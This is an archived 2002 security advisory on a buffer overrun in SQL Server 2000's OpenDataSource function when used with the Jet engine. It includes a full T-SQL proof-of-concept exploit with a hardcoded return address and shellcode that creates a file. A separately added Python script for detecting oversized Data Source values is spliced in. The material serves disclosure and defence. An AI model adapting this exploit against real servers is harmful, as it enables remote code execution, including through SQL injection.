
SQL server remote exploit via OpenDataSource function overflow
20th Jun 2002 [SBWID-5470]
COMMAND

	SQL server remote exploit via OpenDataSource function overflow

SYSTEMS AFFECTED

	SQL server 2000, Windows 2000 SP 2

PROBLEM

	From the NGSSoftware Insight Security Research advisory [#NISR19062002]
	by Mark Litchfield [mark@ngssoftware.com] and David Litchfield
	[david@ngssoftware.com] [http://www.ngssoftware.com/vna/ms-sql.txt]:

	Microsoft's database server SQL Server 2000 has a remotely exploitable
	buffer overrun vulnerability in the OpenDataSource function when combined
	with the MS Jet Engine. Because this is a JET problem, other products may
	also be vulnerable; however, the fix for all products should be the same.

	By making a specially crafted SQL query using the OpenDataSource function
	it is possible to overflow a buffer in the SQL Server process and gain
	control of its execution remotely. If SQL Server is running with SYSTEM
	privileges, which is the default, any code supplied by the attacker in an
	exploit of the overflow will run uninhibited. Whilst the overflow is
	UNICODE in nature, as will be shown, it is still very easy to exploit.

	What must be stressed is that this may be launched via a web server
	application that is vulnerable to SQL injection, so the fact that no
	direct access to the SQL Server can be gained from the Internet does not
	mean it is safe. All customers running SQL Server should check their
	patch level.
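	As an added defender-side example (not part of the advisory), the check below scans logged T-SQL statements for OpenDataSource calls whose Data Source value is far longer than any real path or is mostly filler, which is the shape the overflow described above takes. The sample statements, thresholds and function names are constructed here and are assumptions, not anything from NGSSoftware.

```python
import re

# Constructed sample statements (not from the advisory) as they might appear in
# a SQL Server trace or an application's query log.
SAMPLE_STATEMENTS = [
    "SELECT * FROM OpenDataSource('Microsoft.Jet.OLEDB.4.0', "
    "'Data Source=\"c:\\reports\\sales.xls\";User ID=Admin;Password=;"
    "Extended properties=Excel 5.0')...Sheet1$",
    "SELECT * FROM OpenDataSource('Microsoft.Jet.OLEDB.4.0', "
    "'Data Source=\"c:\\" + "A" * 2100 + "\";User ID=Admin;Password=;"
    "Extended properties=Excel 5.0')...xactions",
    "SELECT name FROM sysobjects WHERE xtype = 'U'",
]

# Matches the two quoted arguments of OpenDataSource(provider, connection_string).
ODS_RE = re.compile(r"OpenDataSource\s*\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.IGNORECASE)
MAX_PATH = 260   # longest legitimate Win32 path; the advisory's filler alone is over 1000 chars
MAX_RUN = 32     # a run of one repeated character this long is filler, not a file name


def parse_conn_string(conn):
    """Split 'Key=Value;Key=Value' into a dict, stripping surrounding double quotes."""
    props = {}
    for part in conn.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            props[key.strip().lower()] = value.strip().strip('"')
    return props


def assess(statement):
    """Return (severity, message) findings for one statement; empty means nothing unusual."""
    findings = []
    for match in ODS_RE.finditer(statement):
        provider, conn = match.group(1), match.group(2)
        src = parse_conn_string(conn).get("data source", "")
        if provider.lower().startswith("microsoft.jet.oledb"):
            findings.append(("info", "Jet provider reached through OpenDataSource; confirm Jet patch level"))
        if len(src) > MAX_PATH:
            findings.append(("high", "Data Source length %d exceeds MAX_PATH" % len(src)))
        if re.search(r"(.)\1{%d,}" % (MAX_RUN - 1), src):
            findings.append(("high", "Data Source is a long run of one repeated character"))
        if any(not 32 <= ord(ch) <= 126 for ch in src):
            findings.append(("high", "Data Source contains non-printable or non-ASCII characters"))
    return findings


def is_suspicious(statement):
    """True when any finding is high severity, i.e. the call looks like an overflow attempt."""
    return any(sev == "high" for sev, _ in assess(statement))
```

	The info-level finding on its own only records that the Jet path is in use; a real path stays well under MAX_PATH, so the high-severity checks separate ordinary spreadsheet queries from padded ones.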
	

	

	Exploit
	=======

	

	This Transact-SQL script will create a file called "SQL-ODSJET-BO" in
	the root of the C: drive.
	

	-------8<---------

	-- Simple Proof of Concept
	-- Exploits a buffer overrun in OpenDataSource()
	--
	-- Demonstrates how to exploit a UNICODE overflow using T-SQL
	-- Calls CreateFile() creating a file called c:\SQL-ODSJET-BO
	-- I'm overwriting the saved return address with 0x42B0C9DC
	-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2
	-- The address holds a jmp esp instruction.
	--
	-- To protect against this overflow download the latest Jet Service
	-- pack from Microsoft - http://www.microsoft.com/
	--
	-- David Litchfield (david@ngssoftware.com)
	-- 19th June 2002

	declare @exploit nvarchar(4000)
	declare @padding nvarchar(2000)
	declare @saved_return_address nvarchar(20)
	declare @code nvarchar(1000)
	declare @pad nvarchar(16)
	declare @cnt int
	declare @more_pad nvarchar(100)

	select @cnt = 0
	select @padding = 0x41414141
	select @pad = 0x4141

	-- build the filler that reaches the saved return address
	while @cnt < 1063
	begin
	  select @padding = @padding + @pad
	  select @cnt = @cnt + 1
	end

	-- overwrite the saved return address
	select @saved_return_address = 0xDCC9B042
	select @more_pad = 0x4343434344444444454545454646464647474747

	-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K SP2
	-- change if running a different service pack
	select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC

	-- the filler, return address and code are passed as the Data Source path
	select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\'
	select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code
	select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions'
	exec (@exploit)

	------->8---------

SOLUTION

	Microsoft recommends that customers upgrade their version of Jet. The
	latest version is available from here:

	http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearch%26ordinal%3D2%26redirect%3Dno

	

	

	Further good reading from NGSSoftware:

	http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
	http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
	http://www.ngssoftware.com/papers/ntbufferoverflow.html
	http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
	http://www.ngssoftware.com/papers/unicodebo.pdf
	http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf

	

	
